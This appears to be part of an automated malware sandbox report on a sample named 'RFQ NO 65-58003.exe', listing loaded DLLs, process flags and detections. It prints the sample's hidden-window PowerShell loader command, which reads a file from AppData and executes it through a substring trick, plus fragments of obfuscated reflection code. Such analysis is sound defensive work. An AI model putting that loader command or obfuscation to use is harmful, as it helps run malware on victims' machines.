              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: RFQ NO 65-58003.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Ljubljana $Halvulden $Stoker), (idrtsanlgget @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Demetri12 = [AppDomain]::CurrentDomain.GetAssemblies()$global:
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Toppers)), $Unoptimistically).DefineDynamicModule($Indholdsanalysers, $false).DefineType($Remains, $Educability, [System.MulticastDele
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish)
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish)Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,17_2_004044A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_21202806 push ecx; ret 14_2_21202819
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_21211219 push esp; iretd 14_2_2121121A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0044693D push ecx; ret 17_2_0044694D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0044DB70 push eax; ret 17_2_0044DB84
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0044DB70 push eax; ret 17_2_0044DBAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00451D54 push eax; ret 17_2_00451D61
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044B090 push eax; ret 19_2_0044B0A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044B090 push eax; ret 19_2_0044B0CC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00451D34 push eax; ret 19_2_00451D41
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00444E71 push ecx; ret 19_2_00444E81
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00414060 push eax; ret 20_2_00414074
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00414060 push eax; ret 20_2_0041409C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00414039 push ecx; ret 20_2_00414049
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004164EB push 0000006Ah; retf 20_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00416553 push 0000006Ah; retf 20_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00416555 push 0000006Ah; retf 20_2_004165C4

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_004047CB
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
